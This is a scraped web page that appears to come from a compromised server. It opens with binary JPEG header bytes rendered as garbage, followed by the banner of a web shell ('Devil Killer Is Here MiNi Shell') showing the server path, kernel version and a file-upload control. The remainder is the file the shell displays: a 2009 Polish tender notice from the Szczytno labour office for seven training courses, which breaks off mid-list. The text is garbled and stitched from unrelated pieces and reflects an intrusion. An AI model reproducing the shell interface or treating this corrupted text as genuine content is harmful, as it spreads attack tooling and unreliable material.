JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090930/339998-N-2009.html

<p class="kh_header"><b>Szczytno: Usługi szkoleniowe w zakresie zorganizowania i przeprowadzenia siedmiu różnych tematycznie szkoleń dla skierowanych osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie.</b><br>
<b>Numer ogłoszenia: 339998 - 2009; data zamieszczenia: 30.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Szczytnie , ul. Ogrodowa 17, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 0-89 6243287, faks 0-89 6243287.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe w zakresie zorganizowania i przeprowadzenia siedmiu różnych tematycznie szkoleń dla skierowanych osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi szkoleniowe dla skierowanych osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie.
Zamówienie publiczne zalicza się do kategorii: Usług edukacyjnych i szkoleniowych o symbolu 80000000-4, Usług szkolenia zawodowego o symbolu 80530000-8, Usług szkolenia komputerowego o symbolu 80533100-0, zgodnie ze Wspólnym Słownikiem Zamówień (CPV). Zamówienie dotyczy przeprowadzenia siedmiu różnych tematycznie szkoleń, łącznie dla 137 osób bezrobotnych (planuje się w grupie od 12 do 20 osób w zależności od rodzaju szkolenia). Zamówienie publiczne zostało podzielone na siedem części, z czego każda część stanowi odrębne szkolenie. Dopuszcza się składanie ofert częściowych na wybraną część zamówienia (na wybrany kierunek szkolenia). Wykonawca może złożyć oferty na dowolnie wybrane części zamówienia. Każda część będzie oddzielnie oceniana..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy nie podlegają wykluczeniu 
na podstawie art. 24 ust. 1 i 2 Pzp oraz spełniają warunki określone w art. 22 ust. 1 Ustawy, tj.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień w zakresie organizowania  i przeprowadzania szkoleń objętych niniejszym zamówieniem, w szczególności są instytucjami szkoleniowymi w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.), tj. posiadają wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy 
ze względu na siedzibę instytucji szkoleniowej;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
zamówienia; a także spełniają warunki określone w specyfikacji istotnych warunków zamówienia. Zamawiający dokona oceny spełniania tych warunków na zasadzie spełnia/nie spełnia na podstawie dokumentów i oświadczeń złożonych przez wykonawcę wraz z ofertą, wskazanych w niniejszej specyfikacji. Ofertę wykonawcy wykluczonego uzna się za odrzuconą zgodnie z art. 24 ust. 4 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Załączniki określone w SIWZ należy wypełnić ściśle według warunków i postanowień zawartych w SIWZ, bez dokonywania w nich jakichkolwiek zmian. W przypadku, gdy jakaś część danego dokumentu (załącznika) nie dotyczy wykonawcy, należy wpisać w tym miejscu nie dotyczy.
W celu potwierdzenia spełniania warunków udziału w postępowaniu, wykonawcy powinni wraz z ofertą, wypełnioną zgodnie z FORMULARZEM OFERTY SZKOLENIA stanowiącym Załącznik nr 1 do specyfikacji istotnych warunków zamówienia, złożyć 
- w formie pisemnej - następujące dokumenty:
a) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 i nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy - zgodnie ze wzorem załączonym do specyfikacji istotnych warunków zamówienia.  
b) oryginał lub potwierdzoną za zgodność z oryginałem kopię zaświadczenia o wpisie do rejestru instytucji szkoleniowych wydanego przez wojewódzki urząd pracy (WUP) właściwy ze względu na adres siedziby instytucji szkoleniowej. 
Fakt posiadania przez instytucję szkoleniową wpisu do rejestru instytucji szkoleniowych Zamawiający sprawdzi w centralnym rejestrze instytucji szkoleniowych, dostępnym na stronie internetowej www.ris.praca.gov.pl.
c) oryginał lub potwierdzoną za zgodność z oryginałem kopię aktualnego zaświadczenia o wpisie podmiotu do ewidencji działalności gospodarczej lub aktualny odpis z Krajowego Rejestru Sądowego albo innego właściwego rejestru określającego status prawny, rodzaj i zakres działalności oraz organy lub osoby upoważnione do występowania w imieniu wykonawcy i zawierający zapis o prowadzeniu edukacji w formach pozaszkolnych, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert do przetargu;
d) oryginały lub potwierdzoną za zgodność z oryginałem kopię aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że wykonawca   nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne  i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert do przetargu;
e) oryginał lub potwierdzoną za zgodność z oryginałem kopię decyzji właściwego kuratora oświaty w sprawie przyznania akredytacji dla placówek i ośrodków prowadzących kształcenie ustawiczne w formach pozaszkolnych w zakresie kierunku szkolenia objętego przetargiem, w przypadku kiedy wykonawca uzyskał akredytację właściwego kuratora oświaty;
f) oryginały lub potwierdzone za zgodność z oryginałem przez wykonawcę kopie dodatkowych dokumentów potwierdzających uprawnienia instytucji szkoleniowych 
w zakresie realizacji określonych kierunków szkoleń, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
- Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w pkt 8.1.c - w oryginale lub notarialnie poświadczona kopia pełnomocnictwa.
- W przypadku składania oferty przez wykonawców występujących wspólnie (konsorcja, spółki cywilne), należy dodatkowo spełnić następujące warunki:
- Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia. Do oferty należy dołączyć pełnomocnictwo w oryginale     lub notarialnie poświadczonej kopii.
- Dokumenty określone w punktach 8.1.a - 8.1.f dołącza każdy wykonawca.
- Oferta oraz dokumenty potwierdzające spełnianie warunków udziału w postępowaniu powinny być podpisane przez każdego wykonawcę lub ustanowionego pełnomocnika.
- Wykonawcy działający wspólnie zobowiązani są załączyć do oferty umowę regulującą współpracę tych wykonawców, zawierającą co najmniej postanowienia:
- zawiązanie porozumienia na czas nie krótszy niż czas trwania umowy,
- wskazanie pełnomocnika,
- zapis o wspólnej i solidarnej odpowiedzialności w zakresie realizowanego zamówienia,
- zakaz zmiany partnerów (wykonawców) wspólnie realizujących dane zamówienie   
  publiczne w trakcie jego obowiązywania,
- w przypadku spółek cywilnych - umowę spółki cywilnej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40.0</li>
<li>2 - Zakres i jakość programu szkolenia - 20.0</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>4 - Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5 - Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szczytno.up.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Szczytnie
ul. Ogrodowa 17, 12-100 Szczytno.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Szczytnie
ul. Ogrodowa 17, 12-100 Szczytno
sekretariat - pokój nr 13 (II piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KURS ZAKŁADANIA I PROWADZENIA WŁASNEJ FIRMY Z OBSŁUGĄ KOMPUTERA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest promowanie idei przedsiębiorczości wśród osób bezrobotnych oraz przygotowanie uczestników szkolenia do założenia, uruchomienia, a następnie samodzielnego prowadzenia własnej działalności gospodarczej. Szkoleniem będą objęte jednocześnie dwie grupy szkoleniowe (2 grupy x 20 osób), dla których zajęcia będą prowadzone odrębnie w tym samym okresie czasu.
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian nastawiony na zmianę postaw, podniesienie motywacji na rozwój kompetencji interpersonalnych i doskonalenie cech przedsiębiorczych. Zajęcia te powinny odbywać się w formie warsztatowej. Dodatkowo pod koniec realizacji szkolenia każdy uczestnik powinien zostać objęty coachingiem, obejmującym indywidualne doradztwo w zakresie dalszego rozwoju osobistego i planów zawodowych osoby. 
Łącznie zagadnienia te powinny obejmować 20 godzin (w tym 18 godzin zajęć grupowych + 2 godziny indywidualnego coachingu dla każdego uczestnika szkolenia).
II BLOK: Obowiązujące uregulowania prawno - ekonomiczne dotyczące zakładania i prowadzenia działalności gospodarczej, w tym: kryteria wyboru rodzaju działalności gospodarczej, procedury prawno-administracyjne dotyczące rejestracji podmiotu gospodarczego - etapy zakładania firmy, analiza rynku, warsztaty tworzenia biznesplanów z uwzględnieniem specyfiki różnych branż (zgodnie z zainteresowaniem zgłoszonym przez uczestników szkolenia), obowiązki przedsiębiorcy względem Urzędu Skarbowego i ZUS, wybór formy opodatkowania, prowadzenie dokumentacji finansowo - księgowej i podatkowej samodzielnego podmiotu gospodarczego, elementy marketingu i promocji w prowadzeniu własnej firmy oraz możliwości pozyskiwania środków finansowych z różnych źródeł na założenie i rozwój działalności. Szczególny nacisk należy położyć na analizę poszczególnych biznesplanów sporządzonych przez uczestników szkolenia. 
Zajęcia te powinny odbywać się głównie metodą warsztatową, a także w ramach zajęć symulacyjnych i gier edukacyjnych. Łącznie zagadnienia te powinny obejmować 60 godzin.
III BLOK: Obsługa komputera w prowadzeniu małego biznesu, w tym: obsługa środowiska Windows, wybrane zagadnienia z pakietu Microsoft Office (w szczególności Word, Excel), obsługa Internetu oraz programów użytkowych wspomagających prowadzenie własnej firmy, m.in. w zakresie prowadzenia księgowości, fakturowania itp. Łączna liczba godzin: 40 godzin na każdego uczestnika szkolenia. Zajęcia z zakresu obsługi komputera mają zostać przeprowadzone dla każdej 20 osobowej grupy szkoleniowej, w grupach liczących maksymalnie po 10 osób w każdej. Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby w każdej grupie szkoleniowej każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. Należy więc zapewnić dwie pracownie komputerowe, w każdej po minimum 10 komputerów + 1 komputer dla instruktora zajęć..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Zakres i jakość programu szkolenia - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS UMIEJĘTNOŚCI KOMPUTEROWYCH - EUROPEJSKI CERTYFIKAT UMIEJĘTNOŚCI KOMPUTEROWYCH ECDL - Z TRENINGIEM INTERPERSONALNYM.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest podwyższenie poziomu umiejętności użytkowania komputera w pracy zawodowej i w życiu codziennym oraz przygotowanie uczestników szkolenia do egzaminu teoretycznego i praktycznego z niżej wymienionych obszarów tematycznych (Blok II - Blok VIII). 
Szkolenie powinno składać się z następujących bloków tematycznych:
I BLOK: Trening interpersonalny, w tym metody i techniki poszukiwania pracy oraz trening gotowości do zmian, nastawiony na zmianę postaw i wzrost motywacji oraz przygotowanie uczestników szkolenia do aktywnego poszukiwania pracy. Zajęcia te powinny odbywać się w formie ćwiczeń, warsztatów. W II połowie trwania szkolenia każdy uczestnik powinien zostać objęty 2 godzinnym coachingiem, obejmującym indywidualne doradztwo w zakresie dalszego rozwoju osobistego i planów zawodowych osoby. Łącznie zagadnienia te powinny obejmować 30 godzin (w tym 28 godzin zajęć grupowych + 2 godziny indywidualnego coachingu dla każdego uczestnika szkolenia).
II BLOK: Podstawy technik informatycznych - dotyczy podstaw użytkowania i zastosowania komputera - 20 godz.
III BLOK: Użytkowanie komputerów - znajomość podstawowych funkcji porządkujących środowisko pracy każdego użytkownika komputera w celu zwiększenia efektywności jego wykorzystania - 30 godz.
IV BLOK: Przetwarzanie tekstów - poprawne użycie komputera do tworzenia, edycji, formatowania, przechowywania i drukowania dokumentów - 30 godz.
V BLOK: Arkusze kalkulacyjne - wykorzystanie oprogramowania do przeprowadzania powtarzalnych obliczeń: przygotowywania budżetów, opracowywania prognoz, sporządzania wykresów i raportów finansowych - 40 godz.
VI BLOK: Bazy danych - tworzenie i wykorzystanie baz danych do organizowania dużych zasobów danych, umożliwiając szybki i łatwy dostęp do nich - 40 godz. 
VII BLOK: Grafika menadżerska i prezentacyjna - użycie technik graficznych, oferowanych przez komputery, jako efektywnego środka komunikacji, szeroko wykorzystywanego w biznesie i nauczaniu - 40 godz.
VIII BLOK: Usługi w sieciach informatycznych - użycie ogólnoświatowej sieci komputerowej do pozyskiwania informacji i szybkiego komunikowania się z innymi użytkownikami komputerów - 30 godz. 
-Zajęcia z zakresu obsługi komputera powinny być przeprowadzone jednocześnie w tym samym czasie w dwóch grupach szkoleniowych (maksymalnie po 10 osób w każdej grupie).
- Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. Należy więc zapewnić dwie pracownie komputerowe, w każdej po minimum 10 komputerów + 1 komputer dla instruktora zajęć.
- Szkolenie powinno być przeprowadzone przez instytucję szkoleniową posiadającą uprawnienia do egzaminowania w zakresie Europejskiego Certyfikatu Umiejętności Komputerowych oraz wyposażoną w odpowiedni sprzęt i oprogramowanie niezbędne do przeprowadzenia egzaminów ECDL. 
- Egzaminy powinny być przeprowadzone przez egzaminatorów ECDL posiadających certyfikat Egzaminatora ECDL oraz wpisanych na listę egzaminatorów ECDL prowadzoną przez Polskie Biuro ECDL. 
- Do oferty należy dołączyć dokumenty potwierdzające posiadanie powyższych uprawnień, zarówno przez instytucję szkoleniową jak i wykładowców, egzaminatorów z ramienia instytucji szkoleniowej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Zakres i jakość programu szkolenia - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS PROJEKTOWANIA STRON INTERNETOWYCH Z GRAFIKĄ KOMPUTEROWĄ I NAUKĄ JĘZYKA ANGIELSKIEGO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest przygotowanie osób bezrobotnych do pracy w zawodach: Projektant stron internetowych (webmaster) w zakresie pracy HTML i CSS w projektowaniu stron internetowych oraz Grafik komputerowy w zakresie pracy: Zastosowanie grafiki w reklamie i wydawnictwach z nauką języka angielskiego. Wstępnie przewiduje się grupę osób bezrobotnych posiadających biegłą umiejętność obsługi komputera oraz podstawową znajomość języka angielskiego. Szkolenie powinno zostać zrealizowane z wykorzystaniem modułowego programu szkolenia zawodowego dla zawodu Projektant stron internetowych (webmaster) (kod zawodu: 213202) oraz dla zawodu Grafik komputerowy (kod zawodu: 311801), dostępnych w bazie danych prowadzonej przez Ministra Pracy i Polityki Społecznej na stronie internetowej: www.standardyiszkolenia.praca.gov.pl 
Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. Należy więc zapewnić minimum 20 komputerów + 1 komputer dla instruktora zajęć.
Zajęcia z zakresu praktycznej obsługi komputera i języka angielskiego powinny odbywać się z podziałem na dwie grupy szkoleniowe w dwóch salach, jeżeli liczba uczestników przekroczy 16 osób.  
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Projektowanie stron internetowych, w tym:
- wykorzystanie HTML w budowie stron internetowych;
- wykorzystanie CSS w budowie stron internetowych.
Wymagana liczba godzin: 120 godzin.
II BLOK: Zastosowanie grafiki komputerowej w reklamie i wydawnictwach, w tym:
- posługiwanie się oprogramowaniem do tworzenia grafiki wektorowej i rastrowej z wykorzystaniem powszechnie używanych programów graficznych CorelDRAW oraz Photoshop;
- przygotowanie wydruków czarno-białych i wyciągów barwnych w czterech podstawowych kolorach;
- automatyzacja pracy podczas opracowywania grafiki bitmapowej;
- projektowanie kompozycji graficznych wykorzystywanych w reklamie i wydawnictwach.
Łącznie zagadnienia te powinny obejmować 180 godzin.
III BLOK: Nauka języka angielskiego z uwzględnieniem specyfiki branży informatycznej. Wymagana liczba godzin: 80 godzin..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Zakres i jakość programu szkolenia - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KURS ZAWODU PILARZ - DRWAL.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do pracy na stanowisku drwala, operatora pilarek spalinowych i elektrycznych oraz uzyskanie obowiązujących w tym zakresie uprawnień zawodowych. Program kursu powinien być opracowany na podstawie wytycznych dla drwali, operatorów pilarek, 
opracowanych w Regionalnej Dyrekcji Lasów Państwowych. Podczas realizacji zajęć praktycznych uczestnikom szkolenia należy zapewnić posiłki regeneracyjne    i podstawową niezbędną odzież ochronną. Do oferty szkolenia należy dołączyć zgodę wskazanego nadleśnictwa na prowadzenie w ramach szkoleniowych zajęć praktycznych ścinki drzew na określonym terenie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Zakres i jakość programu szkolenia - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KURS ZAWODU BLACHARZ - LAKIERNIK SAMOCHODOWY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest teoretyczne i praktyczne przygotowanie osób bezrobotnych do wykonywania zawodu blacharz - lakiernik samochodowy w zakresie pracy: samochody osobowe i dostawcze. Szkolenie powinno zostać zrealizowane z wykorzystaniem modułowego programu szkolenia zawodowego dla zawodu Blacharz samochodowy (kod zawodu: 721303) oraz dla zawodu Lakiernik samochodowy (kod 
zawodu: 714201), dostępnych w bazie danych prowadzonej przez Ministra Pracy i Polityki Społecznej na stronie internetowej: www.standardyiszkolenia.praca. gov. pl    
Program szkolenia powinien obejmować, m.in.:
1. Przepisy bezpieczeństwa i higieny pracy oraz przepisy przeciwpożarowe.
